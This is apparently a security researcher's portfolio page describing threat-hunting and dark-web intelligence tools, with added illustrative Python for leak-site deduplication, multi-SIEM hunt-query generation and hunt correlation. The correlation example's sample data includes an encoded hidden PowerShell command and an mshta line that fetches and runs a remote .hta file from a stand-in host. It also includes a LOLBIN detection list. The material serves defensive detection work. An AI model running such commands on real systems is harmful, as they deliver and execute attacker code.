Neeraj Sihag

Hunting adversaries.
Building the tools to do it faster.

Security researcher and builder. I run detection engineering and threat intelligence operations for enterprise clients — hunting active threat actors, monitoring dark web infrastructure, and building the tooling that makes all of it faster.

On any given day: tracking a ransomware group's leak site, writing detection logic for a new attack chain hitting Indian enterprises, automating what used to take an analyst hours, or shipping a new security product.

I study adversary tradecraft from primary sources — actor forums, real campaigns, leaked tooling — because understanding how attacks are built is what makes detections that actually hold up.

Threat Hunting · Detection Engineering · Dark Web Intelligence · Adversary Research · Security Tooling · MSSP
01

Threat Hunting

Hypothesis-driven hunting across enterprise SIEM environments. Building detection logic from scratch against real attack chains — not from template rules. Every hunt starts with an adversary behavior, not a vendor alert.

Blue Team
02

Adversary Research

Reading adversary tradecraft from primary sources — actor forums, real campaigns, leaked tooling. Understanding how attacks are actually built so detections don't fail the moment the playbook deviates.

Tradecraft
03

AI × Security

Applying LLMs practically to security workflows — alert triage, threat brief authoring, hunt query generation. Shipped THREATPULSE, a chat-based CTI platform, and HuntWire, an agentic threat hunting engine that runs continuous autonomous hunts across the environment.

Intelligence
04

Dark Web Intelligence

Continuous monitoring of ransomware leak sites, actor forums, and paste infrastructure. Tracking victim disclosures, new group activity, and infrastructure changes before they surface in public feeds. Built tooling to do this at scale.

OSINT

Technical Stack

Detection & Hunting

  • IBM QRadar
  • Palo Alto XSIAM
  • Splunk
  • Wazuh
  • MITRE ATT&CK
  • Sigma Rules

Development

  • Python / FastAPI
  • React / Vite
  • Laravel / PHP
  • PowerShell
  • SQLite / Postgres
  • Docker

Intelligence

  • Ransomware Site Monitoring
  • Threat Actor Tracking
  • Dark Web Infrastructure
  • Victim Disclosure Analysis
  • Actor Attribution
  • Enterprise Threat Briefing
01

DarkPulse

Live

Real-time dark web threat monitoring platform.

Continuous monitoring across ransomware leak sites, actor forums, and paste infrastructure. Tracks new victim disclosures, group activity spikes, and infrastructure pivots — before they surface anywhere else. Built the full data pipeline from scratch: collection, deduplication, normalisation, and a client reporting layer.

Python · React · Dark Web · Threat Monitoring · Ransomware Intel
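The deduplication and normalisation stage of a leak-site pipeline, as an added example rather than DarkPulse's own code. Posts scraped from several ransomware leak sites arrive with cosmetic differences (casing, "www.", trailing slashes, stray punctuation in the victim name) and the same victim is often reposted by a second group. The sample posts, field names and the victim-key rule (domain when present, otherwise the normalised title) are all constructed assumptions; the point is that only genuinely new disclosures, plus cross-group reposts as a separate signal, should reach the reporting layer.

```python
"""Leak-site post normalisation, deduplication and new-disclosure diff.

Added example, not DarkPulse's own code. Sample posts below are constructed.
"""
from __future__ import annotations
import hashlib
import re
import unicodedata
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: one victim seen on two crawls of the same group with
# cosmetic differences, then reposted by a second group, plus an unrelated post.
RAW_POSTS = [
    {"group": "LockBit", "title": "ACME Corp.", "domain": "www.acme-corp.example", "seen": "2026-01-04T10:00:00Z"},
    {"group": "lockbit", "title": "Acme  Corp", "domain": "ACME-CORP.example/", "seen": "2026-01-05T08:30:00Z"},
    {"group": "Play", "title": "Acme Corp", "domain": "acme-corp.example", "seen": "2026-01-06T12:00:00Z"},
    {"group": "Play", "title": "Globex Industries", "domain": "", "seen": "2026-01-06T12:05:00Z"},
]


@dataclass
class Disclosure:
    group: str
    victim: str
    first_seen: datetime
    last_seen: datetime
    sightings: int


def norm_domain(d: str) -> str:
    """Lowercase, strip scheme, path and a leading 'www.' so crawls agree on one key."""
    d = re.sub(r"^[a-z]+://", "", d.strip().lower())
    d = d.split("/")[0]
    return d[4:] if d.startswith("www.") else d


def norm_title(t: str) -> str:
    """Unicode-fold, drop punctuation and collapse whitespace for title-only posts."""
    t = unicodedata.normalize("NFKC", t).casefold()
    t = re.sub(r"[^\w\s]", " ", t)
    return " ".join(t.split())


def victim_key(post: dict) -> str:
    # Assumption: a domain is the most stable identifier; fall back to the title.
    return norm_domain(post["domain"]) or norm_title(post["title"])


def dedup_key(post: dict) -> str:
    """Stable id for (group, victim); the same victim under another group is a new event."""
    raw = f"{post['group'].strip().lower()}|{victim_key(post)}"
    return hashlib.sha256(raw.encode()).hexdigest()


def consolidate(posts: list[dict]) -> dict[str, Disclosure]:
    """Merge repeated sightings into one disclosure with first/last seen and a count."""
    out: dict[str, Disclosure] = {}
    for p in posts:
        ts = datetime.fromisoformat(p["seen"].replace("Z", "+00:00"))
        k = dedup_key(p)
        if k in out:
            d = out[k]
            d.first_seen, d.last_seen = min(d.first_seen, ts), max(d.last_seen, ts)
            d.sightings += 1
        else:
            out[k] = Disclosure(p["group"].strip().lower(), victim_key(p), ts, ts, 1)
    return out


def new_since(current: dict[str, Disclosure], previous_keys: set[str]) -> list[Disclosure]:
    """Diff against the previous run: only keys not seen before are reportable."""
    return [d for k, d in current.items() if k not in previous_keys]


def reposts(current: dict[str, Disclosure]) -> dict[str, list[str]]:
    """Victims claimed by more than one group, worth reporting as a separate signal."""
    by_victim: dict[str, list[str]] = {}
    for d in current.values():
        by_victim.setdefault(d.victim, []).append(d.group)
    return {v: sorted(g) for v, g in by_victim.items() if len(g) > 1}


if __name__ == "__main__":
    current = consolidate(RAW_POSTS)
    previous = {dedup_key(RAW_POSTS[0])}          # pretend only the first crawl ran before
    for d in new_since(current, previous):
        print(f"NEW  {d.group:<10} {d.victim} (sightings={d.sightings})")
    for victim, groups in reposts(current).items():
        print(f"REPOST {victim} claimed by {', '.join(groups)}")
```

Keying on (group, victim) rather than victim alone is deliberate: a second group claiming the same organisation is a distinct disclosure for the client, so it is surfaced through `reposts()` instead of being silently deduplicated away.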
02

THREATPULSE

Live

Chat-based cyber threat intelligence platform.

Feed it an actor name, a domain, or a hash: it enriches the indicator across live intel sources and generates hunt queries for every major SIEM simultaneously. Presented publicly at the NullU Delhi Chapter meetup.

FastAPI · React · Claude API · CTI · Multi-SIEM
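The "one indicator in, one hunt query per SIEM out" step, as an added example and not THREATPULSE's code. The indicator is classified by shape (SHA-256, IP, domain) and rendered into Splunk SPL, QRadar AQL and Cortex XSIAM XQL. The field names (Splunk CIM-style `file_hash`/`src_ip`/`dest_ip`/`query`/`url`, QRadar's `"File Hash"` and `"URL"` custom properties, XSIAM's `action_file_sha256`/`action_remote_ip`/`dns_query_name` on `xdr_data`) are assumptions about a typical data model and must be aligned with your own schema. The practitioner point is that strict shape validation is what makes interpolating chat input into a query string safe: anything that is not a well-formed indicator is rejected before it can reach a query.

```python
"""Indicator classification and multi-SIEM hunt-query generation.

Added example, not THREATPULSE's own code. Field names are assumed.
"""
from __future__ import annotations
import ipaddress
import re
from dataclasses import dataclass

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
# RFC 1123 hostname: labels of letters/digits/hyphens, no leading or trailing hyphen, alphabetic TLD.
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)((?!-)[a-z0-9-]{1,63}(?<!-)\.)+[a-z]{2,63}$")


@dataclass(frozen=True)
class Indicator:
    kind: str   # "sha256" | "ip" | "domain"
    value: str  # normalised: lowercase, surrounding whitespace and trailing dot removed


def classify(raw: str) -> Indicator:
    """Classify by shape. Anything that does not match a strict pattern is
    rejected, so untrusted chat input never reaches a query string."""
    value = raw.strip().lower().rstrip(".")
    if SHA256_RE.match(value):
        return Indicator("sha256", value)
    try:
        return Indicator("ip", str(ipaddress.ip_address(value)))
    except ValueError:
        pass
    if DOMAIN_RE.match(value):
        return Indicator("domain", value)
    raise ValueError(f"unrecognised indicator: {raw!r}")


# Fields to search per SIEM and indicator kind (assumed schema; adjust to yours).
FIELDS = {
    "splunk": {"sha256": ["file_hash"], "ip": ["src_ip", "dest_ip"], "domain": ["query", "url"]},
    "qradar": {"sha256": ['"File Hash"'], "ip": ["sourceip", "destinationip"], "domain": ['"URL"']},
    "xsiam":  {"sha256": ["action_file_sha256"], "ip": ["action_remote_ip"], "domain": ["dns_query_name"]},
}


def build_queries(ind: Indicator, lookback_hours: int = 24) -> dict[str, str]:
    """Render one hunt query per SIEM dialect. Interpolating ind.value is safe
    only because classify() restricted it to the characters [a-z0-9.:-]."""
    v = ind.value
    splunk_where = " OR ".join(f'{f}="{v}"' for f in FIELDS["splunk"][ind.kind])
    aql_where = " OR ".join(f"{f} = '{v}'" for f in FIELDS["qradar"][ind.kind])
    xql_where = " or ".join(f'{f} = "{v}"' for f in FIELDS["xsiam"][ind.kind])
    return {
        "splunk": (f"index=* earliest=-{int(lookback_hours)}h ({splunk_where}) "
                   "| stats count min(_time) as first_seen max(_time) as last_seen by host"),
        "qradar": ("SELECT sourceip, destinationip, COUNT(*) AS hits FROM events "
                   f"WHERE ({aql_where}) GROUP BY sourceip, destinationip "
                   f"LAST {int(lookback_hours)} HOURS"),
        "xsiam": (f"dataset = xdr_data | filter {xql_where} "
                  "| comp count() as hits by agent_hostname"),
    }


def hunt_queries(raw: str, lookback_hours: int = 24) -> dict[str, str]:
    """Convenience wrapper: raw indicator text in, one query per SIEM out."""
    return build_queries(classify(raw), lookback_hours)


if __name__ == "__main__":
    for siem, q in hunt_queries("Evil-CDN.Example.").items():
        print(f"[{siem}] {q}")
```

Each dialect searches both directions for an IP (source and destination) because a C2 address can appear in either column depending on the log source; the hash and domain forms search the single field that carries that value in the assumed schema.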
03

HuntWire

Live

Agentic threat hunting engine.

Doesn't wait for alerts. Runs continuous, autonomous hunting cycles across the environment — forming hypotheses, querying the SIEM, correlating findings across log sources, and surfacing threats that would never trip a rule. Built to do in minutes what a manual hunt takes hours to run.

Agentic · Autonomous · Local Inference · Python
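One hunt cycle as the Threat Hunting card and the HuntWire description above lay it out: state a hypothesis as an adversary behaviour, query each log source for its half of the chain, then correlate the halves by host and time window so that two individually unremarkable events become one finding. This is an added example, not HuntWire's or any vendor's code. The two log sources are constructed in-memory samples with Sysmon-like and DNS-like field names, the known-good domain baseline is invented, and `query()` stands in for a SIEM search.

```python
"""Hypothesis-driven hunt with cross-source correlation.

Added example; not HuntWire's code. Events, field names and baseline are constructed.
"""
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample: a macro-to-C2 chain on WS-042, benign admin activity on WS-007,
# and an Office child process on WS-042 later in the day with no DNS inside the window.
PROCESS_EVENTS = [
    {"time": ts("2026-02-10T09:01:00"), "host": "WS-042", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmd": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"time": ts("2026-02-10T09:30:00"), "host": "WS-007", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell Get-ChildItem"},
    {"time": ts("2026-02-10T11:00:00"), "host": "WS-042", "parent": "EXCEL.EXE", "image": "mshta.exe",
     "cmd": "mshta http://cdn-updates.example/a.hta"},
]
DNS_EVENTS = [
    {"time": ts("2026-02-10T09:01:07"), "host": "WS-042", "query": "cdn-updates.example"},
    {"time": ts("2026-02-10T09:30:02"), "host": "WS-007", "query": "login.microsoftonline.com"},
    {"time": ts("2026-02-10T15:00:00"), "host": "WS-042", "query": "cdn-updates.example"},
]
KNOWN_GOOD = {"login.microsoftonline.com", "update.microsoft.com"}   # assumed baseline

OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
LOLBINS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "rundll32.exe"}


@dataclass
class Hypothesis:
    name: str
    technique: str
    stage_a: Callable[[dict], bool]   # first link of the chain, over process events
    stage_b: Callable[[dict], bool]   # second link, over DNS events
    window: timedelta                 # how soon after stage A stage B must occur


@dataclass
class Finding:
    host: str
    hypothesis: str
    technique: str
    evidence: list[dict]


MACRO_TO_C2 = Hypothesis(
    name="Office child process followed by resolution of a non-baseline domain",
    technique="T1566.001 -> T1059 -> T1071",
    stage_a=lambda e: e["parent"].lower() in OFFICE and e["image"].lower() in LOLBINS,
    stage_b=lambda e: e["query"].lower() not in KNOWN_GOOD,
    window=timedelta(minutes=5),
)


def query(source: list[dict], predicate: Callable[[dict], bool]) -> list[dict]:
    """Stand-in for a SIEM search: filter one log source by a predicate."""
    return [e for e in source if predicate(e)]


def correlate(a_hits: list[dict], b_hits: list[dict], window: timedelta) -> list[tuple[dict, dict]]:
    """Pair each stage-A event with stage-B events on the same host inside the window."""
    return [(a, b) for a in a_hits for b in b_hits
            if b["host"] == a["host"] and timedelta(0) <= b["time"] - a["time"] <= window]


def hunt(h: Hypothesis, procs: list[dict], dns: list[dict]) -> list[Finding]:
    """One cycle: query stage A, stop early if the hypothesis has no support,
    query stage B, correlate, and roll the evidence up per host."""
    a_hits = query(procs, h.stage_a)
    if not a_hits:
        return []
    b_hits = query(dns, h.stage_b)
    findings: dict[str, Finding] = {}
    for a, b in correlate(a_hits, b_hits, h.window):
        f = findings.setdefault(a["host"], Finding(a["host"], h.name, h.technique, []))
        f.evidence.extend([a, b])
    return list(findings.values())


if __name__ == "__main__":
    for f in hunt(MACRO_TO_C2, PROCESS_EVENTS, DNS_EVENTS):
        print(f"{f.host}: {f.technique} ({len(f.evidence)} correlated events)")
```

The window is what turns a noisy indicator into a finding: "Office spawned PowerShell" on its own fires on every macro-driven workflow, and "a domain outside the baseline" fires constantly, but the two on the same host seven seconds apart is worth an analyst's time. The 11:00 Excel-to-mshta event on WS-042 is correctly left as a stage-A lead rather than a finding, because no matching DNS event falls inside its window.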
04

ADSentinel

Live

Active Directory security assessment platform.

Built for enterprise environments. Orchestrates auditing via an authenticated agent, consolidates findings by risk category, and generates client-ready reports, replacing what used to be a manual multi-tool process.

Laravel 13 · Filament 5 · PowerShell · Active Directory · MSSP
05

OSINT Engine

Live

Passive infrastructure reconnaissance and actor mapping toolkit.

Maps exposed services, certificate history, and subdomain relationships onto known threat actor targeting patterns. Used operationally to build actor infrastructure profiles and identify pivot points before engagement.

Python · OSINT · Cert Transparency · Actor Mapping
Stealth

[Redacted]

Security infrastructure product.

Architecture complete. Building quietly — the idea is too sharp to surface yet.

Stealth

[Redacted]

Consumer product.

Building quietly.

Public Talk

AI-Driven Cyber Threat Intelligence Pipelines

NullU Delhi Chapter — eSec Forte Technologies, 2026

Presented THREATPULSE — a live demo of a chat-based CTI platform enriching indicators in real time and generating hunt queries across multiple SIEM platforms simultaneously. First public talk at a security community meetup.

Currently: Building detection logic for advanced phishing and identity-based attack chains in enterprise environments. Writing monthly threat intelligence briefs for Indian enterprise clients covering active threat actor activity, emerging TTPs, and recommended defensive posture.

Let's work.

Security work, product collaborations, intelligence engagements — or just to talk tradecraft.